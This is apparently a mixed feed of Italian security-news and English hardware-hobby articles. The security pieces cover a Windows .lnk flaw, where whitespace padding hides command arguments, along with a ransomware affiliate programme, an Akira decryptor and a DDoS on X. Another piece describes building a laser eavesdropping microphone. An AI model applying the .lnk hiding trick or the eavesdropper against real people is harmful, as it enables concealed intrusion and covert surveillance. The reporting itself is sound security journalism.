La vulnerabilità, identificata come ZDI-CAN-25373, consente agli aggressori di eseguire comandi dannosi nascosti sui computer delle vittime sfruttando file di collegamento di Windows (.lnk) appositamente creati. Questa falla di sicurezza influisce sul modo in cui Windows visualizza il contenuto dei file di collegamento tramite la sua interfaccia utente. Quando gli utenti esaminano un file .lnk compromesso, Windows non riesce a visualizzare i comandi dannosi nascosti al suo interno, nascondendo di fatto il vero pericolo del file.
Ad oggi sono stati scoperti quasi 1.000 artefatti del file .LNK che sfruttano ZDI-CAN-25373, la maggior parte dei quali è collegata a Evil Corp (Water Asena), Kimsuky (Earth Kumiho), Konni (Earth Imp), Bitter (Earth Anansi) e ScarCruft (Earth Manticore).
Degli 11 attori di minacce sponsorizzati dallo stato che sono stati scoperti ad abusare della falla, quasi la metà di loro proviene dalla Corea del Nord. Oltre a sfruttare la falla in vari momenti, la scoperta serve come indicazione di collaborazione incrociata tra i diversi cluster di minacce che operano all’interno dell’apparato informatico di Pyongyang.
Paesi di origine APT che hanno sfruttato ZDI-CAN-25373 (fonte TrendMicro)
Nello specifico, il bug comporta l’aggiunta degli argomenti con i caratteri di spazio (0x20), tabulazione orizzontale (0x09), avanzamento riga (0x0A), tabulazione verticale (\x0B), avanzamento pagina (\x0C) e ritorno a capo (0x0D) per eludere il rilevamento.
I dati di telemetria indicano che governi, enti privati, organizzazioni finanziarie, think tank, fornitori di servizi di telecomunicazione e agenzie militari/difesa situate negli Stati Uniti, in Canada, Russia, Corea del Sud, Vietnam e Brasile sono diventati i principali obiettivi degli attacchi che sfruttano questa vulnerabilità.
Negli attacchi analizzati da ZDI, i file .LNK fungono da veicolo di distribuzione per famiglie di malware note come Lumma Stealer, GuLoader e Remcos RAT, tra gli altri. Tra queste campagne, degna di nota è lo sfruttamento di ZDI-CAN-25373 da parte di Evil Corp.
Vale la pena notare che .LNK è tra le estensioni di file pericolose bloccate nei prodotti microsoft come Outlook, Word, Excel, PowerPoint e OneNote. Di conseguenza, il tentativo di aprire tali file scaricati dal Web avvia automaticamente un avviso di sicurezza che consiglia agli utenti di non aprire file da fonti sconosciute.
L'articolo 8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT proviene da il blog della sicurezza informatica.
VanHelsing RaaS: Un Nuovo Modello di Ransomware-as-a-Service in Espansione
Il panorama delle minacce ransomware è in costante evoluzione, con gruppi sempre più strutturati che adottano strategie sofisticate per massimizzare il profitto. VanHelsing è un nuovo attore che si sta posizionando nel mercato del Ransomware-as-a-Service (RaaS), un modello che consente anche a cybercriminali con competenze limitate di condurre attacchi avanzati grazie a una piattaforma automatizzata.
Dopo l’annuncio del 23 febbraio 2025 sul forum underground riguardante il programma di affiliazione VanHelsing RaaS, il gruppo ransomware ha ufficialmente pubblicato la prima possbile vittima sul proprio Data Leak Site (DLS).
A meno di un mese dal lancio, la comparsa della prima organizzazione colpita conferma che il gruppo ha iniziato ad operare attivamente. Sebbene il DLS sia ancora scarno, il debutto di una vittima suggerisce che gli affiliati stiano già distribuendo il ransomware e che il numero di attacchi potrebbe aumentare rapidamente.
VanHelsing RaaS: Un Programma Strutturato per gli Affiliati
L’annuncio del 23 febbraio ha rivelato dettagli significativi sul funzionamento del programma VanHelsing RaaS, che si distingue per una strategia di reclutamento selettivo e strumenti avanzati.
Punti chiave del programma di affiliazione:
- Ingresso su invito: gli affiliati con una reputazione consolidata nel cybercrime possono aderire gratuitamente.
- Quota di ingresso per nuovi affiliati: chi non ha una reputazione pregressa deve pagare $5.000 per accedere alla piattaforma.
- Strumenti avanzati: accesso a un pannello web, un sistema di chat privato, un locker per chiavi di cifratura, strumenti di esfiltrazione dati e funzionalità di attacco ransomware automatizzate.
- Revenue sharing: gli affiliati trattengono l’80% del riscatto, mentre VanHelsing trattiene il 20%.
- Escrow su blockchain: i fondi vengono rilasciati dopo due conferme, riducendo i rischi di frode tra affiliati e sviluppatori.
- Crittografia avanzata: utilizzo di protocolli di cifratura di alto livello per rendere il ransomware resiliente alle contromisure.
- Automazione completa: il ransomware è interamente gestito tramite il pannello di controllo, eliminando errori operativi e riducendo la necessità di intervento manuale.
La Prima Possibile Vittima Pubblicata sul DLS
La prima possibile organizzazione colpita da VanHelsing RaaS opera nel settore pubblico, con funzioni amministrative Questo suggerisce che il gruppo potrebbe prendere di mira enti governativi, municipalità o servizi pubblici, categorie spesso vulnerabili a ransomware.
L’attacco sembra seguire una strategia di doppia estorsione, con un countdown di 10 giorni prima della pubblicazione dei dati esfiltrati. Questo lascia intendere che il gruppo stia negoziando un riscatto con l’ente colpito, cercando di massimizzare il profitto prima di rendere pubbliche eventuali informazioni sensibili.
Anatomia del DLS
Al momento, il DLS di VanHelsing contiene una sola possibile vittima, il che potrebbe indicare diverse possibilità:
- Il gruppo sta testando l’infrastruttura prima di pubblicare attacchi su larga scala.
- Ci sono altre vittime in fase di negoziazione, che non sono ancora state elencate nel DLS.
- Gli affiliati stanno ancora adottando il ransomware, e il numero di attacchi potrebbe aumentare esponenzialmente nelle prossime settimane.
L’esperienza con altri gruppi RaaS dimostra che il numero di vittime può crescere rapidamente man mano che nuovi cybercriminali iniziano ad utilizzare il servizio.
VanHelsing Chat: La Piattaforma di Comunicazione Privata
Un altro elemento distintivo di VanHelsing è la presenza di un portale di chat privato, accessibile solo tramite un Session ID. Questa piattaforma suggerisce che il gruppo gestisce direttamente le negoziazioni con le vittime e le comunicazioni con gli affiliati, senza affidarsi a strumenti pubblici come Telegram o forum underground.
L’adozione di una chat privata offre diversi vantaggi operativi:
- Maggiore sicurezza → Riduce il rischio di infiltrazioni da parte delle forze dell’ordine o di ricercatori di cybersecurity.
- Gestione diretta delle richieste di riscatto → Le vittime possono comunicare direttamente con il team di VanHelsing o con l’affiliato responsabile dell’attacco.
- Coordinamento degli affiliati → I membri del programma RaaS possono ricevere supporto tecnico e aggiornamenti operativi in tempo reale.
Questa infrastruttura è indicativa di un gruppo ransomware che punta a una gestione centralizzata e professionale degli attacchi, un elemento distintivo rispetto a operatori meno organizzati.
Conclusioni
L’emergere di VanHelsing RaaS rappresenta un’ulteriore evoluzione del modello ransomware, con un’infrastruttura altamente scalabile e strumenti avanzati per affiliati. La loro attenzione all’automazione e alla sicurezza operativa suggerisce che potremmo assistere a un aumento degli attacchi nei prossimi mesi, con impatti significativi su aziende e infrastrutture critiche.
L'articolo VanHelsing RaaS: Un Nuovo Modello di Ransomware-as-a-Service in Espansione proviene da il blog della sicurezza informatica.
Spy Tech: Build Your Own Laser Eavesdropper
Laser microphones have been around since the Cold War. Back in those days, they were a favorite tool of the KGB – allowing spies to listen in on what was being said in a room from a safe distance. This project by [SomethingAbtScience] resurrects that concept with a DIY build that any hacker worth their soldering iron can whip up on a modest budget. And let’s face it, few things are cooler than turning a distant window into a microphone.
At its core this hack shines a laser on a window, detects the reflected light, and picks up subtle vibrations caused by conversations inside the room. [SomethingAbtScience] uses an ordinary red laser (visible, because YouTube rules) and repurposes an amplifier circuit ripped from an old mic, swapping the capsule for a photodiode. The build is elegant in its simplicity, but what really makes it shine is the attention to detail: adding a polarizing filter to cut ambient noise and 3D printing a stabilized sensor mount. The output is still a bit noisy, but with some fine tuning – and perhaps a second sensor for differential analysis – there’s potential for crystal-clear audio reconstruction. Just don’t expect it to pass MI6 quality control.
While you probably won’t be spying on diplomats anytime soon, this project is a fascinating glimpse into a bygone era of physical surveillance. It’s also a reminder of how much can be accomplished with a laser pointer, some ingenuity, and the curiosity to see how far a signal can travel.
youtube.com/embed/EiVi8AjG4OY?…
Speeding Up Your Projects With Direct Memory Access
Here’s the thing about coding. When you’re working on embedded projects, it’s quite easy to run into hardware limitations, and quite suddenly, too. You find yourself desperately trying to find a way to speed things up, only… there are no clock cycles to spare. It’s at this point that you might reach for the magic of direct memory access (DMA). [Larry] is here to advocate for its use.
DMA isn’t just for the embedded world; it was once a big deal on computers, too. It’s just rarer these days due to security concerns and all that. Whichever platform you’re on, though, it’s a valuable tool to have in your arsenal. As [Larry] explains, DMA is a great way to move data from memory location to memory location, or from memory to peripherals and back, without involving the CPU. Basically, a special subsystem handles trucking data from A to B while the CPU gets on with whatever other calculations it had to do. It’s often a little more complicated in practice, but that’s what [Larry] takes pleasure in explaining.
Indeed, back before I was a Hackaday writer, I was no stranger to DMA techniques myself—and I got my project published here! I put it to good use in speeding up an LCD library for the Arduino Due. It was the perfect application for DMA—my main code could handle updating the graphics buffer as needed, while the DMA subsystem handled trucking the buffer out to the LCD quicksmart.
If you’re struggling with updating a screen or LED strings, or you need to do something fancy with sound, DMA might just be the ticket. Meanwhile, if you’ve got your own speedy DMA tricks up your sleeve, don’t hesitate to let us know!
Ultra-Low Power Soil Moisture Sensor
Electricity can be a pretty handy tool when it stays within the bounds of its wiring. It’s largely responsible for our modern world and its applications are endless. When it’s not running in wires or electronics though, things can get much more complicated even for things that seem simple on the surface. For example, measuring moisture in soil seems straightforward, but corrosion presents immediate problems. To combat the problems with measuring things in the natural world with electricity, [David] built this capacitive soil moisture sensor which also has the benefit of using an extremely small amount of energy to operate.
The sensor is based on an STM32 microcontroller, in this case one specifically optimized for low-power applications. The other low-power key to this build is the small seven-segment e-ink display. The segments are oriented as horizontal lines, making this a great indicator for measuring a varying gradient of any type. The microcontroller only wakes up every 15 minutes, takes a measurement, and then updates the display before going back to sleep.
To solve the problem resistive moisture sensors have where they’re directly in contact with damp conditions and rapidly corrode, [David] is using a capacitive sensor instead which measures a changing capacitance as moisture changes. This allows the contacts to be much more isolated from the environment. The sensor has been up and running for a few months now with the coin cell driving the system still going strong and the house plants still alive and properly watered. Of course if you’re looking to take your houseplant game to the next level you could always build a hydroponics system which automates not only the watering of plants but everything else as well.
A Foot Pedal To Supplement Your Keyboard
It’s 2025, and you’re still probably pressing modifier keys on your keyboard like a… regular person. But it doesn’t have to be this way! You could use foot pedals instead, as [Jan Herman] demonstrates.
Now, if you’re a diehard embedded engineer, you might be contemplating your favorite USB HID interface chip and how best to whip up a custom PCB for the job. But it doesn’t have to be that complicated! Instead, [Jan] goes for an old school hack—he simply ripped the guts out of an cheap USB keyboard. From there, he wired up a few of the matrix pads to 3.5 mm jack connectors, and put the whole lot in a little metal project box. Then, he hooked up a few foot pedal switches with 3.5 mm plugs to complete the project.
[Jan] has it set up so he can plug foot pedals in to whichever keys he needs at a given moment. For example, he can plug a foot pedal in to act as SPACE, ESC, CTRL, ENTER, SHIFT, ALT, or left or right arrow. It’s a neat way to make the project quickly reconfigurable for different productivity tasks. Plus, you can see what each pedal does at a glance, just based on how it’s plugged in.
It’s not an advanced hack, but it’s a satisfying one. We’ve seen some other great builds in this space before, too. If you’re cooking up your own keyboard productivity hacks, don’t hesitate to let us know!
The Capacitor Plague of the Early 2000s
Somewhere between the period of 1999 and 2007 a plague swept through the world, devastating lives and businesses. Identified by a scourge of electrolytic capacitors violently exploding or splurging their liquid electrolyte guts all over the PCB, it led to a lot of finger pointing and accusations of stolen electrolyte formulas. In a recent video by [Asianometry] this story is summarized.Blown electrolytic capacitors. (Credit: Jens Both, Wikimedia)
The bad electrolyte in the faulty capacitors lacked a suitable depolarizer, which resulted in more gas being produced, ultimately leading to build-up of pressure and the capacitor ultimately failing in a way that could be rather benign if the scored top worked as vent, or violently if not.
Other critical elements in the electrolyte are passivators, to protect the aluminium against the electrolyte’s effects. Although often blamed on a single employee stealing an (incomplete) Rubycon electrolyte formula, the video questions this narrative, as the problem was too widespread.
More likely it coincided with the introduction of low-ESR electrolytic capacitors, along with computers becoming increasingly more power-hungry, and thus stressing the capacitors in a much warmer environment than in the early 1990s. Combine this with the presence of counterfeit capacitors in the market and the truth of what happened to cause the Capacitor Plague probably involves a bit from each column, a narrative that seems to be the general consensus.
youtube.com/embed/rSpzAVpnXo4?…
Keebin’ with Kristina: the One with the Cheesy Keyboard
Let’s just kick things off in style with the fabulously brutalist Bayleaf wireless split from [StunningBreadfruit30], shall we? Be sure to check out the wonderful build log/information site as well for the full details.
Image by [StunningBreadfruit30] via redditHere’s the gist: this sexy split grid of beautiful multi-jet fusion (MJF) keycaps sits on top of Kailh PG1316S switches. The CNC-machined aluminium enclosure hides nice!nano boards with a sweet little dip in each one that really pull the keyboard together.
For the first serious custom build, [StunningBreadfruit30] wanted a polished look and finish, and to that I say wow, yes; good job, and nod enthusiastically as I’m sure you are. Believe it or not, [StunningBreadfruit30] came into this with no CAD skills at all. But it was an amazing learning experience overall, and an even better version is in the works.
I didn’t read the things. Is it open-source? It’s not, at least not at this time. But before you get too-too excited, remember that it cost $400 to build, and that doesn’t even count shipping or the tools that this project necessitated purchasing. However, [StunningBreadfruit30] says that it may be for sale in the future, although the design will have an improved sound profile and ergonomics. There’s actually a laundry list of ideas for the next iteration.
Apiaster Aims to Be the Beginner’s Endgame
That’s right — [Saixos]’ adjustable 50-key Apiaster is designed to be endgame right from the start, whether you’re just getting into the ergo side of the hobby, or are already deep in and are just now finding out about this keyboard. Sorry about that!
Image by [Saixos] via redditSo, it’s adjustable? Yes, in more ways than one. It can utilize either a single RP2040 Zero, or else one or multiple XIAO BLEs. The thumb cluster snaps off and can be moved wherever you like.
And [Saixos] didn’t stop there. In the magnificent repo, there’s a Python-generated case that’s highly customizable, plus MX and Choc versions of the PCB. Finally, Apiaster can use either LiPo batteries or a coin cell.
The other main crux of the biscuit here is price, and the Apiaster can be built for about $37 total minus shipping/customs/tariffs and/or tooling. That’s pretty darn good, especially if this really becomes your endgame.
The Centerfold: A ’90s Kid Works Here
Image by [nismology5] via redditAfter using a Durgod Taurus K320 rectangle for a number of years, [nismology5] decided to lean into ergo and acquired a Keychron Q8 with a knob and the Alice layout after falling in love with the look of GMK Panels keycaps and the Alice herself.
Perhaps the biggest change is going from clacky blues on the Taurus to silent and slinky reds. Who knows why such a drastic change, but [nismology5] is digging the smoothness and quietude underneath those GMK Panels clones from Ali.
Now, let’s talk about that sweet trackball. It’s a Clearly Superior Technologies (CST) KidTRAC with a pool ball swapped in. They are discontinued, sadly, but at least one was available as NOS on eBay. Not to worry — they are being produced by another company out of the UK and come in that sweet UNO Draw 4 Wild drip.
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: the Fox was Quite Fetching
The lovely Fox was named not for its primary inventor Glenn J. Barrett, but instead for company president William R. Fox. Although this may seem unfair, the Fox is a pretty great name for a good-looking typewriter.Image via The Classic Typewriter Page
This nineteenth-century Fox appeared in 1898, shortly after it was patented and had a number of nice features, like a notably light touch. The carriage can be removed easily for cleaning and maintenance. And the machine had a “speed escapement”, which affects the carriage advancement timing. It could be set to advance either when a typebar returns to rest, or as soon as the typebar starts off for the platen.
The first Foxes were understroke machines, which is another term for blind writer, meaning that one must lift something out of the way to see what one had written as the typebars strike the platen from underneath. In the case of the Fox, one need only turn the platen slightly.
Frontstroke or ‘visible’ typewriters were coming into vogue already, so the company introduced a frontstroke machine in 1906. It had many of the same features as the blind-writing Foxen, such as the dual-speed escapement. A one- or two-color ribbon could be used, and the machine could be set to oscillate the ribbon so as not to waste the entire bottom half as most typewriters did. I’d like to see it set to oscillate with a two-color ribbon, that’s for sure!
To capitalize on the portable craze, they built the so-called “Baby Fox” in 1917. Corona found the resemblance to their own portables quite striking and successfully sued Fox. The company went out of business in 1921, possibly because of this litigation. Ah, well.
Finally, a Keyboard for Mice
Image by [RobertLobLaw2] via redditMuch like the fuzzy-bezeled cat keyboard from a few Keebins ago, [RobertLobLaw2]’s keyboard isn’t quite as cheesy as may first appear. For one thing, most of the legends are in this Swiss cheese-inspired font that’s a little bit hard to read, so you’d better have your QWERTY straight.
Probably the best thing about these delicious-looking 3D-printed keycaps are the cheese knife Backspace, Enter, and right Shift along with the novelties like the mousy Esc. Underneath all that fromage is a Keychron V6 Max with unknown switches.
[RobertLobLaw2] explains that cheese and keyboards have more in common than you think, as both hobbies use ‘pretentious adjectives to describe the sensory experience (of the hobby)’. Boy, if that isn’t the thocking truth. Should you require such a charcuter-key board for yourself, the files are freely available.
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
Simulating Embedded Development To Reduce Iteration Time
There’s something that kills coding speed—iteration time. If you can smash a function key and run your code, then watch it break, tweak, and smash it again—you’re working fast. But if you have to first compile your code, then plug your hardware in, burn it to the board, and so on… you’re wasting a lot of time. It’s that problem that inspired [Larry] to create an embedded system simulator to speed development time for simple projects.
The simulator is intended for emulating Arduino builds on iPhone and Mac hardware. For example, [Larry] shows off a demo on an old iPhone, which is simulating an ESP32 playing a GIF on a small LCD display. The build isn’t intended for timing-delicate stuff, nor anything involving advanced low-level peripherals or sleep routines and the like. For that, you’re better off with real hardware. But if you’re working on something like a user interface for a small embedded display, or just making minor tweaks to some code… you can understand why the the simulator might be a much faster way to work.
For now, [Larry] has kept the project closed source, as he’s found that it wouldn’t reasonably be possible for him to customize it for everyone’s unique hardware and use cases. Still, it’s a great example of how creating your own tools can ease your life as a developer. We’ve seen [Larry]’s great work around here before, like this speedy JPEG decoder library.
youtube.com/embed/j1ryXNiYefc?…
Checking In On the ISA Wars and Its Impact on CPU Architectures
An Instruction Set Architecture (ISA) defines the software interface through which for example a central processor unit (CPU) is controlled. Unlike early computer systems which didn’t define a standard ISA as such, over time the compatibility and portability benefits of having a standard ISA became obvious. But of course the best part about standards is that there are so many of them, and thus every CPU manufacturer came up with their own.
Throughout the 1980s and 1990s, the number of mainstream ISAs dropped sharply as the computer industry coalesced around a few major ones in each type of application. Intel’s x86 won out on desktop and smaller servers while ARM proclaimed victory in low-power and portable devices, and for Big Iron you always had IBM’s Power ISA. Since we last covered the ISA Wars in 2019, quite a lot of things have changed, including Apple shifting its desktop systems to ARM from x86 with Apple Silicon and finally MIPS experiencing an afterlife in the form of LoongArch.
Meanwhile, six years after the aforementioned ISA Wars article in which newcomer RISC-V was covered, this ISA seems to have not made the splash some had expected. This raises questions about what we can expect from RISC-V and other ISAs in the future, as well as how relevant having different ISAs is when it comes to aspects like CPU performance and their microarchitecture.
RISC Everywhere
Unlike in the past when CPU microarchitectures were still rather in flux, these days they all seem to coalesce around a similar set of features, including out-of-order execution, prefetching, superscalar parallelism, speculative execution, branch prediction and multi-core designs. Most of the performance these days is gained from addressing specific bottlenecks and optimization for specific usage scenarios, which has resulted in such things like simultaneous multithreading (SMT) and various pipelining and instruction decoder designs.
CPUs today are almost all what in the olden days would have been called RISC (reduced instruction set computer) architectures, with a relatively small number of heavily optimized instructions. Using approaches like register renaming, CPUs can handle many simultaneous threads of execution, which for the software side that talks to the ISA is completely invisible. For the software, there is just the one register file, and unless something breaks the illusion, like when speculative execution has a bad day, each thread of execution is only aware of its own context and nothing else.
So if CPU microarchitectures have pretty much merged at this point, what difference does the ISA make?
Instruction Set Nitpicking
Within the world of ISA flamewars, the battle lines have currently mostly coalesced around topics like the pros and cons of delay slots, as well as those of compressed instructions, and setting status flags versus checking results in a branch. It is incredibly hard to compare ISAs in an apple-vs-apples fashion, as the underlying microarchitecture of a commercially available ARMv8-based CPU will differ from a similar x86_64- or RV64I- or RV64IMAC-based CPU. Here the highly modular nature of RISC-V adds significant complications as well.
If we look at where RISC-V is being used today in a commercial setting, it is primarily as simple embedded controllers where this modularity is an advantage, and compatibility with the zillion other possible RISC-V extension combinations is of no concern. Here, using RISC-V has an obvious advantage over in-house proprietary ISAs, due to the savings from outsourcing it to an open standard project. This is however also one of the major weaknesses of this ISA, as the lack of a fixed ISA along the pattern of ARMv8 and x86_64 makes tasks like supporting a Linux kernel for it much more complicated than it should be.
This has led Google to pull initial RISC-V support from Android due to the ballooning support complexity. Since every RISC-V-based CPU is only required to support the base integer instruction set, and so many things are left optional, from integer multiplication (M), atomics (A), bit manipulation (B), and beyond, all software targeting RISC-V has to explicitly test that the required instructions and functionality is present, or use a fallback.
Tempers are also running hot when it comes to RISC-V’s lack of integer overflow traps and carry instructions. As for whether compressed instructions are a good idea, the ARMv8 camp does not see any need for them, while the RISC-V camp is happy to defend them, and meanwhile x86_64 still happily uses double the number of instruction lengths courtesy of its CISC legacy, which would make x86_64 twice as bad or twice as good as RISC-V depending on who you ask.
Meanwhile an engineer with strong experience on the ARM side of things wrote a lengthy dissertation a while back on the pros and cons of these three ISAs. Their conclusion is that RISC-V is ‘minimalist to a fault’, with overlapping instructions and no condition codes or flags, instead requiring compare-and-branch instructions. This latter point cascades into a number of compromises, which is one of the major reasons why RISC-V is seen as problematic by many.
In summary, in lieu of clear advantages of RISC-V against fields where other ISAs are already established, its strong points seem to be mostly where its extreme modularity and lack of licensing requirements are seen as convincing arguments, which should not keep anyone from enjoying a good flame war now and then.
The China Angle
The Loongson 3A6000 (LS3A6000) CPU. (Credit: Geekerwan, Wikimedia)
Although everywhere that is not China has pretty much coalesced around the three ISAs already described, there are always exceptions. Unlike Russia’s ill-fated very-large-instruction-word Elbrus architecture, China’s CPU-related efforts have borne significantly more fruit. Starting with the Loongson CPUs, China’s home-grown microprocessor architecture scene began to take on real shape.
Originally these were MIPS-compatible CPUs. But starting with the 3A5000 in 2021, Chinese CPUs began to use the new LoongArch ISA. Described as being a ‘bit like MIPS or RISC-V’ in the Linux kernel documentation on this ISA, it features three variants, ranging from a reduced 32-bit version (LA32R) and standard 32-bit (LA32S) to a 64-bit version (LA64). In the current LS3A6000 CPU there are 16 cores with SMT support. In reviews these chips are shown to be rapidly catching up to modern x86_64 CPUs, including when it comes to overclocking.
Of course, these being China-only hardware, few Western reviewers have subjected the LS3A6000, or its upcoming successor the LS3A7000, to an independent test.
In addition to LoongArch, other Chinese companies are using RISC-V for their own microprocessors, such as SpacemiT, an AI-focused company, whose products also include more generic processors. This includes the K1 octa-core CPU which saw use in the MuseBook laptop. As with all commercial RISC-V-based cores out today, this is no speed monsters, and even the SiFive Premier P550 SoC gets soundly beaten by even a Raspberry Pi 4’s already rather long-in-the-tooth ARM-based SoC.
Perhaps the most successful use of RISC-V in China are the cores in Espressif’s popular ESP32-C range of MCUs, although here too they are the lower-end designs relative to the Xtensa Lx6 and Lx7 cores that power Espressif’s higher-end MCUs.
Considering all this, it wouldn’t be surprising if China’s ISA scene outside of embedded will feature mostly LoongArch, a lot of ARM, some x86_64 and a sprinkling of RISC-V to round it all out.
It’s All About The IP
The distinction between ISAs and microarchitecture can be clearly seen by contrasting Apple Silicon with other ARMv8-based CPUs. Although these all support a version of the same ARMv8 ISA, the magic sauce is in the intellectual property (IP) blocks that are integrated into the chip. These range from memory controllers, PCIe SerDes blocks, and integrated graphics (iGPU), to encryption and security features. Unless you are an Apple or Intel with your own GPU-solution, you will be licensing the iGPU block along with other IP blocks from IP vendors.
These IP blocks offer the benefit of being able to use off-the-shelf functionality with known performance characteristics, but they are also where much of the cost of a microprocessor design ends up going. Developing such functionality from scratch can pay for itself if you reuse the same blocks over and over like Apple or Qualcomm do. For a start-up hardware company this is one of the biggest investments, which is why they tend to license a fully manufacturable design from Arm.
The actual cost of the ISA in terms of licensing is effectively a rounding error, while the benefit of being able to leverage existing software and tooling is the main driver. This is why a new ISA like LoongArch may very well pose a real challenge to established ISAs in the long run, beacause it is being given a chance to develop in a very large market with guaranteed demand.
Spoiled For Choice
Meanwhile, the Power ISA is also freely available for anyone to use without licensing costs; the only major requirement is compliance with the Power ISA. The OpenPOWER Foundation is now also part of the Linux Foundation, with a range of IBM Power cores open sourced. These include the A2O core that’s based on the A2I core which powered the XBox 360 and Playstation 3’s Cell processor, as well as the Microwatt reference design that’s based on the much newer Power ISA 3.0.
Whatever your fancy is, and regardless of whether you’re just tinkering on a hobby or commercial project, it would seem that there is plenty of diversity in the ISA space to go around. Although it’s only human to pick a favorite and favor it, there’s something to be said for each ISA. Whether it’s a better teaching tool, more suitable for highly customized embedded designs, or simply because it runs decades worth of software without fuss, they all have their place.
Ogni tanto una gioia… anzi mezza! Scoperto un modo per decifrare Akira su server Linux
Il ricercatore Yohanes Nugroho ha rilasciato uno strumento per decifrare i dati danneggiati dalla variante Linux del ransomware Akira. Lo strumento sfrutta la potenza della GPU per ottenere chiavi di decrittazione e sbloccare i file gratuitamente.
L’esperto ha affermato di aver trovato la soluzione dopo che un amico gli ha chiesto aiuto. Ha stimato che il sistema crittografato potrebbe essere violato in circa una settimana (in base al modo in cui Akira genera le chiavi di crittografia utilizzando i timestamp).
Alla fine, il progetto ha richiesto tre settimane per essere completato e il ricercatore ha dovuto spendere circa 1.200 dollari in risorse GPU necessarie per decifrare la chiave di crittografia. Ma alla fine il metodo ha funzionato.
Lo strumento di Nugroho è diverso dai tradizionali decryptor, in cui gli utenti forniscono una chiave per sbloccare i file. Al contrario, utilizza la forza bruta per ottenere chiavi di crittografia (uniche per ogni file), sfruttando il fatto che Akira genera chiavi di crittografia in base all’ora corrente (in nanosecondi) e la utilizza come seed.
Akira genera dinamicamente chiavi di crittografia univoche per ogni file utilizzando quattro diversi timestamp con una precisione al nanosecondo e ne esegue l’hashing utilizzando 1500 cicli di SHA-256.
Queste chiavi vengono crittografate utilizzando RSA-4096 e aggiunte alla fine di ogni file crittografato, rendendone difficile la decifratura senza la chiave privata. Il livello di precisione dei timestamp crea oltre un miliardo di possibili valori al secondo, rendendo difficili gli attacchi brute-force. Inoltre, Nugroho ha scoperto che la versione Linux del malware crittografa più file contemporaneamente utilizzando il multithreading, il che rende ancora più difficile determinare la marca temporale.
Il ricercatore ha ristretto i possibili timestamp dell’attacco brute force esaminando i log condivisi dal suo amico. Ciò ha permesso di rilevare il tempo di esecuzione del ransomware e i metadati del file hanno aiutato a stimare il tempo di completamento della crittografia.
I primi tentativi di hacking furono effettuati sulla RTX 3060 e si rivelarono troppo lenti: il limite era di soli 60 milioni di test al secondo. Nemmeno l’aggiornamento alla RTX 3090 ha aiutato molto.
Alla fine Nugroho si è rivolto ai servizi GPU cloud RunPod e Vast.ai, che hanno fornito potenza sufficiente e hanno contribuito a confermare l’efficacia dello strumento da lui creato. L’esperto ha utilizzato sedici RTX 4090 e ci sono volute circa 10 ore per forzare la chiave. Tuttavia, a seconda del numero di file crittografati da recuperare, questo processo potrebbe richiedere diversi giorni.
Tuttavia, il ricercatore fa notare che gli specialisti delle GPU possono chiaramente ottimizzare il suo codice, quindi le prestazioni possono probabilmente essere migliorate.
Nugroho ha già pubblicato il suo decryptor su GitHub, dove ha anche pubblicato istruzioni dettagliate su come recuperare i file Akira crittografati.
L'articolo Ogni tanto una gioia… anzi mezza! Scoperto un modo per decifrare Akira su server Linux proviene da il blog della sicurezza informatica.
Writing a GPS Receiver from Scratch
GPS is an incredible piece of modern technology. Not only does it allow for locating objects precisely anywhere on the planet, but it also enables the turn-by-turn directions we take for granted these days — all without needing anything more than a radio receiver and some software to decode the signals constantly being sent down from space. [Chris] took that last bit bit as somewhat of a challenge and set off to write a software-defined GPS receiver from the ground up.
As GPS started as a military technology, the level of precision needed for things like turn-by-turn navigation wasn’t always available to civilians. The “coarse” positioning is only capable of accuracy within a few hundred meters so this legacy capability is the first thing that [Chris] tackles here. It is pretty fast, though, with the system able to resolve a location in 24 seconds from cold start and then displaying its information in a browser window. Everything in this build is done in Python as well, meaning that it’s a great starting point for investigating how GPS works and for building other projects from there.
The other thing that makes this project accessible is that the only other hardware needed besides a computer that runs Python is an RTL-SDR dongle. These inexpensive TV dongles ushered in a software-defined radio revolution about a decade ago when it was found that they could receive a wide array of radio signals beyond just TV.
Oltre l’attacco di Dark Storm su X: come l’illusione dell’hacktivismo rinforza il sistema
L’attacco di Dark Storm su X (ex Twitter) è stato significativo per diverse ragioni.
L’attacco del 10 marzo 2025 – un DDoS multilivello eseguito utilizzando una botnet – rivendicato dal gruppo hacktivista pro-palestinese Dark Storm, ha causato un’interruzione globale, colpendo un gran numero di utenti in tutto il mondo e interrompendo i suoi servizi. “C’è stato (e c’è ancora) un massiccio attacco informatico contro X,” ha scritto Musk, “Veniamo attaccati ogni giorno, ma questo è stato fatto con molte risorse. Sembra essere un gruppo grande e coordinato e/o un paese coinvolto.”
In precedenza (agosto 2024) X aveva già subito un attacco DDoS, attacco che analizzato dalla società di sicurezza informatica cinese Qi An Xin XLAB – specializzata in threat intelligence con sede ad Hong Kong – è stato visto come attacco mirato utilizzando quattro botnet master Mirai.
Il gruppo di hacker Dark Storm Team (DST), creato nel settembre 2023, poche settimane prima dell’attacco terroristico di Hamas del 7 ottobre contro Israele, ha rivendicato la responsabilità dell’attacco tramite Telegram, dichiarando di aver messo offline la piattaforma. L’attacco ha coinvolto una botnet di dispositivi compromessi, tra cui dispositivi IoT come telecamere IP e router, per sovraccaricare i server di X. Sebbene Dark Storm abbia rivendicato la responsabilità, alcuni esperti hanno messo in dubbio l’attribuzione a causa della complessità degli attacchi DDoS, che possono coinvolgere traffico da diverse località globali.
Questo attacco sottolinea l’importanza di robuste difese informatiche e la complessa interazione tra motivazioni politiche e criminalità informatica motivata dal profitto.
Ma tali azioni, sostiene Jesse William McGraw su Cyber News, sottolineano come l’hacktivismo contemporaneo, in particolare da parte di gruppi come Anonymous, sia una “opposizione controllata” che reagisce ai cicli di notizie senza sfidare strategicamente le strutture di potere sottostanti. Il vero cambiamento, suggerisce l’autore, richiede lo smantellamento dei “burattinai” che controllano la finanza globale, i governi e le strutture sociali, piuttosto che impegnarsi semplicemente in conflitti superficiali come gli attacchi DDoS. Jesse William suggerisce che le minacce reali non ricevono attenzione e che gli hacktivisti devono iniziare a smantellare le vere reti di guerra basate sulla conoscenza e concentrarsi sui meccanismi di controllo più profondi per causare un cambiamento significativo.
I principi fondamentali dell’hacktivismo e il paradosso
